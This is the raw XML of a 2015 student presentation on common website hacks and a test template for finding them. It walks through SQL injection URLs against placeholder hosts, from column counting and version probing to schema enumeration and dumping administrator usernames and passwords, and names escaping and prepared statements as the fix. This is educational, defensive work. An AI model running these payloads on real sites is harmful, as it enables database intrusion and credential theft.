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3" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="268" r:id="rId9"/>
    <p:sldId id="267"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3" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="89" d="100"/>
          <a:sy n="89" d="100"/>
        </p:scale>
        <p:origin x="-43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12/14/2015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2976" y="809625"/>
            <a:ext cx="11039476" cy="3305176"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="5300" b="1" dirty="0"/>
              <a:t>Research into common website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="5300" b="1" dirty="0" smtClean="0"/>
              <a:t>hacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" b="1" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IE" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IE" sz="2700" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2700" dirty="0"/>
              <a:t>the implementation solutions to generate a usable test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2700" dirty="0" smtClean="0"/>
              <a:t>template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="4400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IE" sz="4400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IE" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" b="1" dirty="0" smtClean="0"/>
              <a:t>Enda Brody T00164481</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3398013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sz="1400" dirty="0" smtClean="0"/>
              <a:t>www.b.c/subcat.php?id=null </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0"/>
              <a:t>Union all select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0" err="1"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0"/>
              <a:t>=database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0" smtClean="0"/>
              <a:t>()– </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0" smtClean="0"/>
              <a:t>www.b.c/subcat.php?id=null </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0"/>
              <a:t>Union all select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>columns_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0"/>
              <a:t>where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0"/>
              <a:t>=database()--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7330" y="1069918"/>
            <a:ext cx="5592905" cy="22371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 y="1069918"/>
            <a:ext cx="5527624" cy="2223066"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2483058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a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>www.b.c/subcat.php?id=null </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0"/>
              <a:t>Union all select group_concat%28admin_username,0x3a,admin_password from administrators</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1276366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Research Question </a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484311" y="1562099"/>
            <a:ext cx="10018713" cy="3124201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" dirty="0"/>
              <a:t>Can a test template environment assist in the finding for common breaches to websites?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3462215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cap="all" dirty="0" smtClean="0"/>
              <a:t>Objectives</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" b="1" cap="all" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IE" b="1" cap="all" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1757027" y="2141621"/>
            <a:ext cx="10491537" cy="4892842"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="3200" dirty="0"/>
              <a:t>This project is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="3200" dirty="0" smtClean="0"/>
              <a:t>to implement web hacks and solutions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="3200" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="3200" dirty="0" smtClean="0"/>
              <a:t>end result will be to produce a walkthrough template.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="3200" dirty="0"/>
              <a:t>A website will be created to run the security breaches in a controlled environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Project will cover </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" dirty="0"/>
              <a:t>network security, database security and html code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" dirty="0" smtClean="0"/>
              <a:t>attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Network peer to peer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Databases SQL and NoSQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Solutions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="3200" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="3200" dirty="0" smtClean="0"/>
              <a:t>prevention protocols will be implanted then re-attacked. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Current security standards will be researched.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2556300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294" y="871860"/>
            <a:ext cx="3317606" cy="333213"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="3100" b="1" dirty="0" smtClean="0"/>
              <a:t>Injection attacks SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="3100" b="1" dirty="0" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IE" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836330" y="3222363"/>
            <a:ext cx="7617741" cy="2853697"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1800" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1800" dirty="0" smtClean="0"/>
              <a:t>scaping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1800" dirty="0"/>
              <a:t>in PHP generally we escape characters in PHP by replacing single quote (‘) in a parameter by double quote to make it valid SQL statement. Developers use </a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1800" dirty="0" smtClean="0"/>
              <a:t>mysql_real_escape_string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1800" dirty="0"/>
              <a:t>() function for escaping special characters it adds backslashes to the query before sending it to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1800" dirty="0" smtClean="0"/>
              <a:t>database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1800" dirty="0"/>
              <a:t>prepared statements. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Example </a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1800" dirty="0"/>
              <a:t>SELECT * FROM USERS WHERE Username =?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1429238" y="2889150"/>
            <a:ext cx="3732832" cy="333213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit fontScale="25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E" sz="11200" b="1" dirty="0" smtClean="0"/>
              <a:t>Solution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2359294" y="6296025"/>
            <a:ext cx="7413356" cy="230315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endParaRPr lang="en-IE" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1870104" y="3222363"/>
            <a:ext cx="7310502" cy="156388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IE" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2143570" y="1323173"/>
            <a:ext cx="7310502" cy="156388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E" sz="1800" smtClean="0"/>
              <a:t>This is were there are flaws in the database or the database code in which an  a attacker gets access.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1312029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Proposed implementation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IE" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484310" y="2238375"/>
            <a:ext cx="10018713" cy="3552825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Create a website HTML PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Create database (SQL,NoSQL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t> Set up peer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>o peer network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Implement hacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0"/>
              <a:t>(10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>most popular ways hackers hack your website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>defencely.com)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Fix the breech and implement a  solution </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Repeat hack and document </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0"/>
              <a:t>The test documentation that will be produced will allow web designers run the same set of security breaches and show how to fix and prevent these hacks to their own website.   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2086403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sz="1600" dirty="0"/>
              <a:t>http://www.b.com/subcat.php?id=13'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509" y="3383280"/>
            <a:ext cx="6593823" cy="1695423"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1671888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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1800" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1800" dirty="0" smtClean="0"/>
              <a:t>www.b.c/subcat.php?id=13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1800" dirty="0"/>
              <a:t>order by 2--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1800" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1800" dirty="0" smtClean="0"/>
              <a:t>www.by.c/subcat.php?id=13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1800" dirty="0"/>
              <a:t>order by 1--</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="1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2182" y="3398520"/>
            <a:ext cx="4846202" cy="2644682"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1988291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sz="1600" dirty="0" smtClean="0"/>
              <a:t>www.b/subcat.php?id=null </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1600" dirty="0"/>
              <a:t>Union all select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0"/>
              <a:t>1--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552" y="2293498"/>
            <a:ext cx="5322708" cy="2705222"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3626521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sz="1600" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1600" dirty="0" smtClean="0"/>
              <a:t>www.bc.com/subcat.php?id=null </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1600" dirty="0"/>
              <a:t>Union all select @@Version--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6961" y="1379220"/>
            <a:ext cx="4854998" cy="2649482"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40388452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303</TotalTime>
  <Words>327</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</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Research into common website hacks and the implementation solutions to generate a usable test template  </vt:lpstr>
      <vt:lpstr>Research Question </vt:lpstr>
      <vt:lpstr>Objectives </vt:lpstr>
      <vt:lpstr>Injection attacks SQL Injection </vt:lpstr>
      <vt:lpstr>Proposed implementation </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>IT Tralee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implementation of common website hacks and show solutions to generate a usable test template.</dc:title>
  <dc:creator>Enda Brody</dc:creator>
  <cp:lastModifiedBy>Enda</cp:lastModifiedBy>
  <cp:revision>32</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-10-12T10:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-12-14T23:49:17Z</dcterms:modified>
</cp:coreProperties>
</file>